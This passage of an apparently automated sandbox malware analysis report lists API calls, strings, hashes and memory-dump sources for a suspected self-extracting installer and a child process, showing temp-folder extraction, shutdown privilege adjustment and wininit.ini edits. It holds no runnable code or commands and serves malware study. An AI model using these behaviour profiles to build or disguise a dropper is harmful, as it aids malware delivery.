                                • Instruction Fuzzy Hash: D8215031A0CD4286FA10AB12B9683B9E652FB8DBA1FC68130DD4E43795EF3CD44DDA10

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                • String ID:
                                • API String ID: 2995914023-0
                                • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                • Instruction ID: 721265afd42de686375d94603b9116ce38cb4c14108c7d7785403eb926f6fcd2
                                • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                • Instruction Fuzzy Hash: 9B511B3190CE4386F760AB65F868375A2A2BF487A4FD60535D94D82295FF3CE449EF20
                                APIs
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5078
                                  • Part of subcall function 00007FF71D1D5050: SizeofResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5089
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50AF
                                  • Part of subcall function 00007FF71D1D5050: LoadResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50C0
                                  • Part of subcall function 00007FF71D1D5050: LockResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50CF
                                  • Part of subcall function 00007FF71D1D5050: memcpy_s.MSVCRT ref: 00007FF71D1D50EE
                                  • Part of subcall function 00007FF71D1D5050: FreeResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50FD
                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF71D1D3123), ref: 00007FF71D1D60C9
                                • LocalFree.KERNEL32 ref: 00007FF71D1D6142
                                  • Part of subcall function 00007FF71D1D4DCC: LoadStringA.USER32 ref: 00007FF71D1D4E60
                                  • Part of subcall function 00007FF71D1D4DCC: MessageBoxA.USER32 ref: 00007FF71D1D4EA0
                                  • Part of subcall function 00007FF71D1D7700: GetLastError.KERNEL32 ref: 00007FF71D1D7704
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                • String ID: $<None>$UPROMPT
                                • API String ID: 957408736-2569542085
                                • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                • Instruction ID: a2fc94be1e469f1f6ec259e53c97f9d127d1515ad2021f60d7805b8acaad9571
                                • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                • Instruction Fuzzy Hash: AB316171A0CE4387F7206B20B57877AF662EB99764F824534DA0E02695EF7DD008DE10
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CreateFile$lstrcmp
                                • String ID: *MEMCAB
                                • API String ID: 1301100335-3211172518
                                • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                • Instruction ID: a7260fe176bfbc008901e4f8dc6ae3d1d69a3c0051917cd97075a8259040333d
                                • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                • Instruction Fuzzy Hash: 8E61B862A0CF4386F7619B15B498379BA92E746B74F865335CA6D027C0EF7CF4099E20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: FileTime$AttributesDateItemLocalText
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                • API String ID: 851750970-388467436
                                • Opcode ID: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                • Instruction ID: a4b7d2020416610fa72ea320c1bed75ac4a792cfd6f2833b9652d22f9a178090
                                • Opcode Fuzzy Hash: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                • Instruction Fuzzy Hash: 5D51A422A1CE5381FA50AB15B468179A7A0FB4ABB0FD64131DA4E43294EF3CF549DB60
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: AllocLocal
                                • String ID: TMP4351$.TMP
                                • API String ID: 3494564517-2619824408
                                APIs
                                  • Part of subcall function 00007FF71D1D3B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF71D1D3A09), ref: 00007FF71D1D3B64
                                  • Part of subcall function 00007FF71D1D3B40: PeekMessageA.USER32 ref: 00007FF71D1D3B89
                                  • Part of subcall function 00007FF71D1D3B40: PeekMessageA.USER32 ref: 00007FF71D1D3BCD
                                • WriteFile.KERNELBASE ref: 00007FF71D1D56E4
                                Similarity
                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                • String ID:
                                • API String ID: 1084409-0
                                APIs
                                Similarity
                                • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                • String ID:
                                • API String ID: 2018477427-0
                                APIs
                                Similarity
                                • API ID: CharPrev
                                • String ID:
                                • API String ID: 122130370-0
                                APIs
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                APIs
                                Strings
                                Similarity
                                • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$horseradish
                                • API String ID: 3530494346-1203528024
                                APIs
                                Strings
                                Similarity
                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                • String ID: CheckTokenMembership$advapi32.dll
                                • API String ID: 4204503880-1888249752
                                APIs
                                Strings
                                Similarity
                                • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                • String ID: SeShutdownPrivilege
                                • API String ID: 2829607268-3733053543
                                APIs
                                Similarity
                                • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                • String ID:
                                • API String ID: 4104442557-0
                                APIs
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                APIs
                                Strings
                                Similarity
                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                • String ID: "$:$@$RegServer
                                • API String ID: 1203814774-4077547207
                                APIs
                                Strings
                                Similarity
                                • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                • String ID: $horseradish
                                • API String ID: 2654313074-507738753
                                APIs
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4A86
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4AAA
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4ACA
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4AEC
                                • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4B1B
                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4B3A
                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4B54
                                • FreeLibrary.KERNEL32 ref: 00007FF71D1D4BF1
                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4C0D
                                Strings
                                Similarity
                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                • API String ID: 1865808269-1731843650
                                APIs
                                Strings
                                Similarity
                                • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                • String ID: horseradish$rce.
                                • API String ID: 2929476258-407637275
                                APIs
                                Strings
                                Similarity
                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                • API String ID: 2659952014-2428544900
                                APIs
                                Strings
                                Similarity
                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                • String ID: horseradish
                                • API String ID: 3785188418-3539543709
                                APIs
                                Similarity
                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                • String ID:
                                • API String ID: 2168512254-0
                                APIs
                                Strings
                                Similarity
                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                • String ID: Control Panel\Desktop\ResourceLocale
                                • API String ID: 3346862599-1109908249
                                APIs
                                Similarity
                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                • String ID:
                                • API String ID: 1051330783-0
                                APIs
                                Similarity
                                • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                • String ID:
                                • API String ID: 975904313-0
                                APIs
                                Similarity
                                • API ID: Window$CapsDeviceRect$Release
                                • String ID:
                                • API String ID: 2212493051-0
                                APIs
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5078
                                  • Part of subcall function 00007FF71D1D5050: SizeofResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5089
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50AF
                                  • Part of subcall function 00007FF71D1D5050: LoadResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50C0
                                  • Part of subcall function 00007FF71D1D5050: LockResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50CF
                                  • Part of subcall function 00007FF71D1D5050: memcpy_s.MSVCRT ref: 00007FF71D1D50EE
                                  • Part of subcall function 00007FF71D1D5050: FreeResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50FD
                                • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF71D1D3139), ref: 00007FF71D1D3F95
                                • LocalFree.KERNEL32 ref: 00007FF71D1D4018
                                  • Part of subcall function 00007FF71D1D4DCC: LoadStringA.USER32 ref: 00007FF71D1D4E60
                                  • Part of subcall function 00007FF71D1D4DCC: MessageBoxA.USER32 ref: 00007FF71D1D4EA0
                                  • Part of subcall function 00007FF71D1D7700: GetLastError.KERNEL32 ref: 00007FF71D1D7704
                                • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF71D1D3139), ref: 00007FF71D1D403E
                                • LocalFree.KERNEL32(?,?,?,?,?,00007FF71D1D3139), ref: 00007FF71D1D409F
                                  • Part of subcall function 00007FF71D1D7AC8: FindResourceA.KERNEL32 ref: 00007FF71D1D7AF2
                                  • Part of subcall function 00007FF71D1D7AC8: LoadResource.KERNEL32 ref: 00007FF71D1D7B09
                                  • Part of subcall function 00007FF71D1D7AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF71D1D7B3F
                                  • Part of subcall function 00007FF71D1D7AC8: FreeResource.KERNEL32 ref: 00007FF71D1D7B51
                                • LocalFree.KERNEL32 ref: 00007FF71D1D4078
                                Strings
                                Similarity
                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                • String ID: <None>$LICENSE
                                • API String ID: 2414642746-383193767
                                APIs
                                  • Part of subcall function 00007FF71D1D114C: _vsnprintf.MSVCRT ref: 00007FF71D1D1189
                                • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF71D1D606F), ref: 00007FF71D1D7763
                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF71D1D606F), ref: 00007FF71D1D7772
                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF71D1D606F), ref: 00007FF71D1D77B8
                                • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF71D1D606F), ref: 00007FF71D1D77EC
                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF71D1D606F), ref: 00007FF71D1D7805
                                Strings
                                Similarity
                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                • String ID: UPDFILE%lu
                                • API String ID: 2922116661-2329316264
                                APIs
                                Similarity
                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                • String ID:
                                • API String ID: 3370778649-0
                                APIs
                                Strings
                                Similarity
                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                • String ID: wininit.ini
                                • API String ID: 3273605193-4206010578
                                APIs
                                Strings
                                Similarity
                                • API ID: Window$Text$DesktopDialogForegroundItem
                                • String ID: horseradish
                                • API String ID: 761066910-3539543709
                                APIs
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5078
                                  • Part of subcall function 00007FF71D1D5050: SizeofResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5089
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50AF
                                  • Part of subcall function 00007FF71D1D5050: LoadResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50C0
                                  • Part of subcall function 00007FF71D1D5050: LockResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50CF
                                  • Part of subcall function 00007FF71D1D5050: memcpy_s.MSVCRT ref: 00007FF71D1D50EE
                                  • Part of subcall function 00007FF71D1D5050: FreeResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50FD
                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF71D1D3388), ref: 00007FF71D1D4975
                                • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF71D1D3388), ref: 00007FF71D1D4A11
                                  • Part of subcall function 00007FF71D1D4DCC: LoadStringA.USER32 ref: 00007FF71D1D4E60
                                  • Part of subcall function 00007FF71D1D4DCC: MessageBoxA.USER32 ref: 00007FF71D1D4EA0
                                Strings
                                Similarity
                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                • String ID: <None>$@$FINISHMSG
                                • API String ID: 3507850446-4126004490
                                APIs
                                Strings
                                Similarity
                                • API ID: LibraryLoad$AttributesFile
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                • API String ID: 438848745-1955609190
                                APIs
                                Similarity
                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                • String ID:
                                • API String ID: 1273765764-0
                                APIs
                                Strings
                                Similarity
                                • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                • String ID: horseradish
                                • API String ID: 2312377310-3539543709
                                APIs
                                Strings
                                Similarity
                                • API ID: File$CloseCreateHandleWrite
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                • API String ID: 1065093856-388467436
                                APIs
                                Strings
                                Similarity
                                • API ID:
                                • String ID: *MEMCAB
                                • API String ID: 0-3211172518
                                APIs
                                Similarity
                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                • String ID:
                                • API String ID: 140117192-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                • String ID:
                                • API String ID: 1214682469-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Char$Prev$Next
                                • String ID:
                                • API String ID: 3260447230-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                • String ID:
                                • API String ID: 140117192-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                • String ID:
                                • API String ID: 2776232527-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2523918112.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_1940000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6dzd
                                • API String ID: 0-617951136
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Memory Dump Source
                                • Source File: 00000001.00000002.2539841416.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7930000_seniorcommunicate.jbxd
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Memory Dump Source
                                • Source File: 00000001.00000002.2523918112.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_1940000_seniorcommunicate.jbxd
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: &$8$A$D$F
                                • API String ID: 0-1047021233
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: /$A$D
                                • API String ID: 0-1541600377
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$D
                                • API String ID: 0-239098570
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: .$6
                                • API String ID: 0-4089497287
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: "
                                • API String ID: 0-123907689
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: !
                                • API String ID: 0-2657877971
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: &
                                • API String ID: 0-1010288
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?
                                • API String ID: 0-1684325040
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: &
                                • API String ID: 0-1010288
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Similarity
                                • API ID:
                                • String ID: A
                                • API String ID: 0-3554254475
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_61b0000_seniorcommunicate.jbxd
                                Memory Dump Source
                                • Source File: 00000001.00000002.2536568902.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                Joe Sandbox IDA Plugin
